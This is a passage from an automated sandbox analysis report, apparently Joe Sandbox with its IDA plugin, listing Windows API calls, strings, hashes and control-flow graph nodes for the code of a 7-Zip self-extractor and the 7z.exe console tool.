                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3015594791-0
                                                                                                                                        • Opcode ID: 09c0142bb5449cde29fe80b00b0c8c4aeb037efaebdbf96b535f10bbdd551267
                                                                                                                                        • Instruction ID: 5f24f27530ec3351cfe61c109b9f8109a002e7470ac3ae9da68eaa6329551e7b
                                                                                                                                        • Opcode Fuzzy Hash: 09c0142bb5449cde29fe80b00b0c8c4aeb037efaebdbf96b535f10bbdd551267
                                                                                                                                        • Instruction Fuzzy Hash: 23016D35101109EFDF109F55ED48EEA7BA6FF14384B18C53EF845A26A0EB35E850DB19
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004033E0: GetWindowTextLengthW.USER32(?), ref: 004033F1
                                                                                                                                          • Part of subcall function 004033E0: GetWindowTextW.USER32(j4@,00000000,00000001), ref: 0040340E
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,0041A834,0041A83C), ref: 0040445E
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0041A834,0041A83C), ref: 00404466
                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00404473
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040447E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??3@TextWindow$Length
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2308334395-0
                                                                                                                                        • Opcode ID: 946fc21653a0a68691e606a30467c9a675c099ea4abd451042eb9ca157acbde2
                                                                                                                                        • Instruction ID: 3481eafec51d8512e57604988f767cc9cc3c1553ab35ab675722db7162792d52
                                                                                                                                        • Opcode Fuzzy Hash: 946fc21653a0a68691e606a30467c9a675c099ea4abd451042eb9ca157acbde2
                                                                                                                                        • Instruction Fuzzy Hash: 31F0FF76D04108BACF05BBA2DD46CDDBB7CEF18348F1040AAF50171091EA799B958B94
                                                                                                                                        APIs
                                                                                                                                        • GetObjectW.GDI32(?,0000005C,?), ref: 00408094
                                                                                                                                        • CreateFontIndirectW.GDI32(?), ref: 004080AA
                                                                                                                                        • GetDlgItem.USER32(?,000004B5), ref: 004080BE
                                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 004080CA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFontIndirectItemMessageObjectSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2001801573-0
                                                                                                                                        • Opcode ID: 264c581feac235bf5db38c3df5d80af8d6bc45eebf8f891e465c2a489f60d106
                                                                                                                                        • Instruction ID: 956e92ef37cd049c126208e7095bac86b33f3b6997e338fc061b002d9265881b
                                                                                                                                        • Opcode Fuzzy Hash: 264c581feac235bf5db38c3df5d80af8d6bc45eebf8f891e465c2a489f60d106
                                                                                                                                        • Instruction Fuzzy Hash: 00F0BE71501708AFDB215BA4DD09FCBBBACAB88B01F048039FA41E22D0DBB4E4148A29
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32(00420B90), ref: 0040B989
                                                                                                                                        • LeaveCriticalSection.KERNEL32(00420B90), ref: 0040B9CC
                                                                                                                                          • Part of subcall function 0040B7A0: ??2@YAPAXI@Z.MSVCRT(00000044), ref: 0040B824
                                                                                                                                          • Part of subcall function 0040B7A0: ??3@YAXPAX@Z.MSVCRT ref: 0040B866
                                                                                                                                          • Part of subcall function 0040B7A0: ??2@YAPAXI@Z.MSVCRT(?,0000001F), ref: 0040B87C
                                                                                                                                          • Part of subcall function 0040B7A0: memmove.MSVCRT(00000000,?,?,?,0000001F), ref: 0040B899
                                                                                                                                          • Part of subcall function 0040B7A0: ??3@YAXPAX@Z.MSVCRT(?,?,0000001F), ref: 0040B8A6
                                                                                                                                          • Part of subcall function 0040B7A0: memmove.MSVCRT(?,?,?,?,?,0000001F), ref: 0040B8C4
                                                                                                                                          • Part of subcall function 0040AEE0: memset.MSVCRT ref: 0040AF4D
                                                                                                                                          • Part of subcall function 0040B910: ??2@YAPAXI@Z.MSVCRT(00000044), ref: 0040B937
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??2@$??3@CriticalSectionmemmove$EnterLeavememset
                                                                                                                                        • String ID: $A$$A
                                                                                                                                        • API String ID: 2633840989-464203494
                                                                                                                                        • Opcode ID: 678182a7b1fb41f2735d9a1324951dca02cc2b15f86711d7f43aa98ef369e29f
                                                                                                                                        • Instruction ID: 6d2d4446e2632278ac84d03e88f46c99b33c2e18b0b42c59bf91942fc9617b32
                                                                                                                                        • Opcode Fuzzy Hash: 678182a7b1fb41f2735d9a1324951dca02cc2b15f86711d7f43aa98ef369e29f
                                                                                                                                        • Instruction Fuzzy Hash: B8E0927431112516892437566C15AFE1B9ACEC5348B00043FF701732C3CFAD299642EE
                                                                                                                                        APIs
                                                                                                                                        • GetParent.USER32(?), ref: 00402088
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 004020A1
                                                                                                                                        • ScreenToClient.USER32(00000000,?), ref: 004020AF
                                                                                                                                        • ScreenToClient.USER32(00000000,?), ref: 004020B6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClientScreen$ParentRectWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2099118873-0
                                                                                                                                        • Opcode ID: c1e4db117b574ef1589c0c9d55717d3f19d7559ec2b1b8ce9c9335790e320de4
                                                                                                                                        • Instruction ID: 302afeb31cedc52bf97cb9c1a24104c68e6dc93ac8c9cb6ce1a7b953da425052
                                                                                                                                        • Opcode Fuzzy Hash: c1e4db117b574ef1589c0c9d55717d3f19d7559ec2b1b8ce9c9335790e320de4
                                                                                                                                        • Instruction Fuzzy Hash: 3DE086721063216FD7119BB5BC88C8B7FADEFC5A26700447AF64592321C7729C20DA72
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004083EA: GetSystemMetrics.USER32(00000010), ref: 0040842C
                                                                                                                                          • Part of subcall function 004083EA: GetSystemMetrics.USER32(00000011), ref: 0040843A
                                                                                                                                        • wsprintfW.USER32 ref: 00405364
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000011,?,00000000,0041B828,?), ref: 004053A1
                                                                                                                                        Strings
                                                                                                                                        • %X - %03X - %03X - %03X - %03X, xrefs: 0040535E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MetricsSystem$??3@wsprintf
                                                                                                                                        • String ID: %X - %03X - %03X - %03X - %03X
                                                                                                                                        • API String ID: 1174869416-1993364030
                                                                                                                                        • Opcode ID: 9da405b217e236085c795cf3f54e4910e22096123c54df3e54b31411474b3c7f
                                                                                                                                        • Instruction ID: 65adf6dcda70838bb3b21e6056e5f535fe41afcbb6b0b1b43c55218142ba6697
                                                                                                                                        • Opcode Fuzzy Hash: 9da405b217e236085c795cf3f54e4910e22096123c54df3e54b31411474b3c7f
                                                                                                                                        • Instruction Fuzzy Hash: 7D117231A40218AADB51FB95ED46FDD7338FF14B08F50417AB911361D2DFB86A45CB88
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??3@wsprintf
                                                                                                                                        • String ID: (%d%s)
                                                                                                                                        • API String ID: 3815514257-2087557067
                                                                                                                                        • Opcode ID: 61444d802996020068455bd4b1035fbf1a094a957ca52f7f25f2d899a103b017
                                                                                                                                        • Instruction ID: b8a3091fb0a8786d5856ec0415992ba747c3c410e3350e73f686e4d9c7ab3f81
                                                                                                                                        • Opcode Fuzzy Hash: 61444d802996020068455bd4b1035fbf1a094a957ca52f7f25f2d899a103b017
                                                                                                                                        • Instruction Fuzzy Hash: E3F06271900218ABCB21B756DD06ECA777CAF00304F1041BBA552B15E2DA75AA54CB98
                                                                                                                                        APIs
                                                                                                                                        • GetWindowTextLengthW.USER32(?), ref: 004033F1
                                                                                                                                        • GetWindowTextW.USER32(j4@,00000000,00000001), ref: 0040340E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: TextWindow$Length
                                                                                                                                        • String ID: j4@
                                                                                                                                        • API String ID: 1006428111-2012685699
                                                                                                                                        • Opcode ID: a5a5aa5c2199368c0d63f38f78d8696d952a23570f2059af60636447187a34c1
                                                                                                                                        • Instruction ID: 3817dcc93708ae326cc9214659a9c4e7fc7be87bb8e982cfdb796d017d3acd91
                                                                                                                                        • Opcode Fuzzy Hash: a5a5aa5c2199368c0d63f38f78d8696d952a23570f2059af60636447187a34c1
                                                                                                                                        • Instruction Fuzzy Hash: 89E09239200212AFC2229F19D84486FBBFAEFC4310B00847AF841D33E1CB39DC118B95
                                                                                                                                        APIs
                                                                                                                                        • MessageBoxA.USER32(00000000,Could not allocate memory,7-Zip SFX,00000010), ref: 0040475C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message
                                                                                                                                        • String ID: 7-Zip SFX$Could not allocate memory
                                                                                                                                        • API String ID: 2030045667-3806377612
                                                                                                                                        • Opcode ID: 6e4107068b50d37af6e098bbdeb86df69921fc5b65f8f057bb3becd2315cd132
                                                                                                                                        • Instruction ID: eff6b3f0ce1e45bdfd51bc9acb40b22f926f37b9a8d4657fa527a9dafaf84f3f
                                                                                                                                        • Opcode Fuzzy Hash: 6e4107068b50d37af6e098bbdeb86df69921fc5b65f8f057bb3becd2315cd132
                                                                                                                                        • Instruction Fuzzy Hash: 5AB012703C130022E21113200C07FC416408B08F13F10C552B108A80D3CBD900D0205D
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BufferConsoleExceptionHandleInfoScreenThrowfputs
                                                                                                                                        • String ID: 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21$ $ || $7-Zip cannot find the code that works with archives.$Can't load module: $Codecs:$Formats:$Hashers:$KSNFMGOPBELH$Libs:$Unsupported archive type$offset=
                                                                                                                                        • API String ID: 3442115484-272389550
                                                                                                                                        • Opcode ID: a931e12469d36633656629b368bfb4bc4574337cde60d6b1639cb76b79ae0d71
                                                                                                                                        • Instruction ID: 5478e315ef4e2972d624409619850f580ad5efbdc34fa4637fac7bb9110c5057
                                                                                                                                        • Opcode Fuzzy Hash: a931e12469d36633656629b368bfb4bc4574337cde60d6b1639cb76b79ae0d71
                                                                                                                                        • Instruction Fuzzy Hash: D672B27A325A81C6DB74EF25E5943AE7361F789B80F808112DA8A47B59DF3CC469CB40
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$ExceptionThrowmallocmemmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3352498445-0
                                                                                                                                        • Opcode ID: 4e256cbe4a0c1d894e55577dd840348a68d2e9127456a459469f7d4970d028a4
                                                                                                                                        • Instruction ID: d8da03401d72f3c764876c6d8c0875f762f06348fd44e3baed1d02cf306ff7c2
                                                                                                                                        • Opcode Fuzzy Hash: 4e256cbe4a0c1d894e55577dd840348a68d2e9127456a459469f7d4970d028a4
                                                                                                                                        • Instruction Fuzzy Hash: 62826332228AC1C5CB34DF26E4903AEB364FB85794F544126EB8D57B59DF78C9A9CB00

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1635 2647ac-26485c call 243314 * 2 1640 26485e-264884 call 242880 1635->1640 1641 26489a-26491b call 266344 call 2432bc call 243b5c free * 2 call 243208 call 243314 1635->1641 1640->1641 1646 264886-264895 call 243404 1640->1646 1656 264921-264925 1641->1656 1657 2649bd-2649cb call 24477c 1641->1657 1646->1641 1656->1657 1658 26492b-26495e call 243208 call 24449c 1656->1658 1662 2649d1-2649e7 1657->1662 1663 264dff 1657->1663 1674 2649b0-2649b8 free 1658->1674 1675 264960-26496f 1658->1675 1671 264a68-264ad2 call 243208 * 3 1662->1671 1672 2649e9-264a28 free * 4 1662->1672 1665 264e02-264e05 1663->1665 1668 264e07-264e1c call 242130 1665->1668 1669 264e40-264e45 1665->1669 1689 264e30 1668->1689 1690 264e1e-264e2e call 243314 1668->1690 1676 264e47-264e58 call 243518 1669->1676 1677 264e5d-264e62 call 2470c8 1669->1677 1717 264d30-264d3b 1671->1717 1718 264ad8-264adb 1671->1718 1679 264a2a 1672->1679 1680 264a58-264a63 free 1672->1680 1674->1657 1682 264971-264978 1675->1682 1683 26497a-26498b 1675->1683 1694 264f2c-264f98 call 253f0c 1676->1694 1687 264e67-264e6a 1677->1687 1688 264a2e-264a41 1679->1688 1692 26504a-265059 free 1680->1692 1682->1683 1691 264993-264996 1682->1691 1683->1691 1687->1694 1695 264e70-264eea GetLastError call 243518 call 24362c free * 4 1687->1695 1696 264a54-264a56 1688->1696 1697 264a43-264a4f free * 2 1688->1697 1700 264e33-264e3b call 24b8f0 1689->1700 1690->1700 1691->1674 1699 264998-2649ad call 243404 1691->1699 1701 26523b-26524e 1692->1701 1714 26505e-265062 1694->1714 1715 264f9e-264fa2 1694->1715 1729 264eec 1695->1729 1730 264f1a-264f27 free 1695->1730 1696->1680 1696->1688 1697->1696 1699->1674 1700->1669 1721 265064-26506c 1714->1721 1722 26506e 1714->1722 1715->1714 1719 264fa8-264fac 1715->1719 1726 264df0-264dfd call 252a84 1717->1726 1727 264d41-264dae call 252a84 free * 4 1717->1727 1724 264b24-264b3e call 26ec5c 1718->1724 1725 264add-264ae0 1718->1725 1719->1714 1728 264fb2-264fc7 call 2532e8 1719->1728 1721->1722 1723 265071-26507d 1721->1723 1722->1723 1732 265152-26516d 1723->1732 1733 265083-2650d1 1723->1733 1750 264b44 1724->1750 1751 264c9d-264cee call 252a84 free * 4 1724->1751 1725->1724 1734 264ae2-264aee 1725->1734 1726->1665 1790 264db0 1727->1790 1791 264dde-264deb free 1727->1791 1728->1714 1749 264fcd-26500d free * 4 1728->1749 1737 264ef0-264f03 1729->1737 1730->1692 1747 265173 1732->1747 1775 265143-265150 call 24ae2c 1733->1775 1776 2650d3-2650de 1733->1776 1739 264af0-264af7 1734->1739 1740 264b4c-264b50 1734->1740 1744 264f15-264f18 1737->1744 1745 264f05-264f10 free * 2 1737->1745 1739->1740 1748 264af9-264b14 call 26b290 1739->1748 1752 264b52-264b5a 1740->1752 1753 264b60-264b63 1740->1753 1744->1730 1744->1737 1745->1744 1756 265175-26517b 1747->1756 1778 264c0a-264c5b call 252a84 free * 4 1748->1778 1779 264b1a-264b22 1748->1779 1759 26500f 1749->1759 1760 26503d-265048 free 1749->1760 1750->1740 1784 264cf0 1751->1784 1785 264d1e-264d2b free 1751->1785 1752->1753 1762 264bf5-264bff 1752->1762 1754 264b65-264b80 call 244318 1753->1754 1755 264bc1-264bc4 1753->1755 1787 264b87-264b9e 1754->1787 1788 264b82-264b85 1754->1788 1771 264bc6-264be1 call 2543fc 1755->1771 1772 264be3-264bf2 call 28c7d4 1755->1772 1766 265190-26519e call 281850 1756->1766 1767 26517d-265188 call 256cd0 1756->1767 1770 265013-265026 1759->1770 1760->1692 1762->1718 1764 264c05 1762->1764 1764->1717 1797 2651a1-2651a6 1766->1797 1767->1766 1781 265038-26503b 1770->1781 1782 265028-265033 free * 2 1770->1782 1771->1762 1771->1772 1772->1762 1775->1756 1776->1775 1789 2650e0-2650e3 1776->1789 1818 264c5d 1778->1818 1819 264c8b-264c98 free 1778->1819 1779->1740 1781->1760 1781->1770 1782->1781 1798 264cf4-264d07 1784->1798 1785->1692 1801 264ba0-264ba8 1787->1801 1802 264baf-264bb3 1787->1802 1788->1755 1803 2650e5-2650e7 1789->1803 1804 265138-265140 1789->1804 1805 264db4-264dc7 1790->1805 1791->1692 1806 2651b1-2651f1 free * 4 1797->1806 1807 2651a8-2651b0 call 256cd0 1797->1807 1808 264d19-264d1c 1798->1808 1809 264d09-264d14 free * 2 1798->1809 1801->1755 1812 264baa-264bad 1801->1812 1802->1755 1813 264bb5-264bbd 1802->1813 1814 26512b-265136 1803->1814 1815 2650e9-2650eb 1803->1815 1804->1775 1816 264dd9-264ddc 1805->1816 1817 264dc9-264dd4 free * 2 1805->1817 1810 2651f3 1806->1810 1811 265221-265239 free * 2 1806->1811 1807->1806 1808->1785 1808->1798 1809->1808 1821 2651f7-26520a 1810->1821 1811->1701 1812->1755 1813->1755 1814->1775 1823 26511f-265129 1815->1823 1824 2650ed-2650f0 1815->1824 1816->1791 1816->1805 1817->1816 1822 264c61-264c74 1818->1822 1819->1692 1826 26521c-26521f 1821->1826 1827 26520c-265217 free * 2 1821->1827 1830 264c86-264c89 1822->1830 1831 264c76-264c81 free * 2 1822->1831 1823->1775 1828 265112-26511d 1824->1828 1829 2650f2-265111 _CxxThrowException 1824->1829 1826->1811 1826->1821 1827->1826 1828->1775 1829->1828 1830->1819 1830->1822 1831->1830
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        • Can not create output directory: , xrefs: 00264E83
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$memmove$ErrorExceptionLastThrow
                                                                                                                                        • String ID: Can not create output directory:
                                                                                                                                        • API String ID: 4159955631-3123869724
                                                                                                                                        • Opcode ID: a7dd44774a86cfc31dca2b164596641d1bd2a47cdc46722eeb7db53c0d916d07
                                                                                                                                        • Instruction ID: 4fcc3e3875479976c35e7564431ce8455b4baefc5065d2a2835475c351d78db3
                                                                                                                                        • Opcode Fuzzy Hash: a7dd44774a86cfc31dca2b164596641d1bd2a47cdc46722eeb7db53c0d916d07
                                                                                                                                        • Instruction Fuzzy Hash: 3F426232625AC196CB34EF26E4903AEB361F7C6780F545112EB8D47B59DF38C9A9CB40

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 2037 265458-2654e2 2038 2654e4-2654f0 2037->2038 2039 2654f2-2654f6 2037->2039 2040 2654fe-265504 2038->2040 2039->2040 2041 2655ec-2655fd 2040->2041 2042 26550a 2040->2042 2044 265612-265615 2041->2044 2045 2655ff-26560a call 242130 2041->2045 2043 26550d-265538 call 247d28 call 243208 2042->2043 2058 26556c-26559c call 24b8f0 free 2043->2058 2059 26553a-26554c call 247ebc 2043->2059 2048 265617-26561f memset 2044->2048 2049 265624-265639 call 242130 2044->2049 2045->2044 2048->2049 2056 26563b-26563e call 253524 2049->2056 2057 265648 2049->2057 2066 265643-265646 2056->2066 2061 26564b-265656 2057->2061 2058->2043 2074 2655a2 2058->2074 2068 265551-265554 2059->2068 2062 265662-2656d1 call 2643b0 2061->2062 2063 265658-265661 2061->2063 2076 2656d3-2656e3 2062->2076 2077 2656fd-265715 2062->2077 2063->2062 2066->2061 2072 265556-265562 2068->2072 2073 2655a4-2655c7 _CxxThrowException 2068->2073 2075 2655c8-2655eb _CxxThrowException 2072->2075 2078 265564 2072->2078 2073->2075 2074->2041 2075->2041 2076->2077 2086 2656e5-2656f8 free 2076->2086 2079 265f1d-265f22 2077->2079 2080 26571b-26571e 2077->2080 2078->2058 2081 265f24-265f27 2079->2081 2082 265f29-265f3d 2079->2082 2084 265726-26572a 2080->2084 2081->2082 2085 265f8d-266002 free * 2 2081->2085 2094 265f54-265f67 2082->2094 2095 265f3f-265f52 free 2082->2095 2087 265c37-265c50 2084->2087 2088 265730-26575f call 247d28 call 243208 2084->2088 2098 266004-266017 2085->2098 2099 265f7c-265f8b free 2086->2099 2087->2084 2090 265c56-265c5a 2087->2090 2103 265772-26577e call 247ebc 2088->2103 2104 265761-265770 2088->2104 2090->2079 2094->2085 2105 265f69-265f7b free 2094->2105 2095->2099 2099->2098 2109 265783-265786 2103->2109 2106 26579e-2657b4 call 281544 2104->2106 2105->2099 2113 265c5f-265c80 free * 2 2106->2113 2114 2657ba-26586c call 264504 call 2642a8 call 2640c4 call 243404 call 274c00 2106->2114 2110 26578c-265798 2109->2110 2111 265ef9-265f1c _CxxThrowException 2109->2111 2110->2106 2110->2111 2111->2079 2113->2099 2126 26586e-265876 2114->2126 2127 26587d-265883 2114->2127 2128 265878 2126->2128 2129 265889-2658b3 call 281bc0 2126->2129 2127->2129 2130 265c85-265c9e free 2127->2130 2128->2127 2136 265d02-265d1e free 2129->2136 2137 2658b9-2658bc 2129->2137 2131 265ca0 2130->2131 2132 265cbe-265cfd free call 264610 free * 2 2130->2132 2134 265ca4-265cbc free 2131->2134 2132->2099 2134->2132 2134->2134 2139 265d20 2136->2139 2140 265d3e-265d7b free call 264610 free * 2 2136->2140 2141 2658c2-2658d3 2137->2141 2142 2659b1-2659bd 2137->2142 2146 265d24-265d3c free 2139->2146 2140->2099 2148 2658d5-265907 call 247d28 call 243208 call 247ebc 2141->2148 2149 265933 2141->2149 2144 2659c3-2659cd 2142->2144 2145 265a8e-265a93 2142->2145 2152 265a95-265a9a 2144->2152 2153 2659d3-2659e1 2144->2153 2151 265aa1-265ab9 2145->2151 2146->2140 2146->2146 2189 265924-265931 free 2148->2189 2190 265909-265915 2148->2190 2155 265936-26594f free 2149->2155 2159 265acc 2151->2159 2160 265abb-265ac3 2151->2160 2152->2151 2157 265a55-265a58 2153->2157 2158 2659e3-2659ed 2153->2158 2161 265951 2155->2161 2162 26596f-2659ac free call 264610 free 2155->2162 2168 265a9c 2157->2168 2169 265a5a-265a86 2157->2169 2164 2659f5-265a11 call 264434 2158->2164 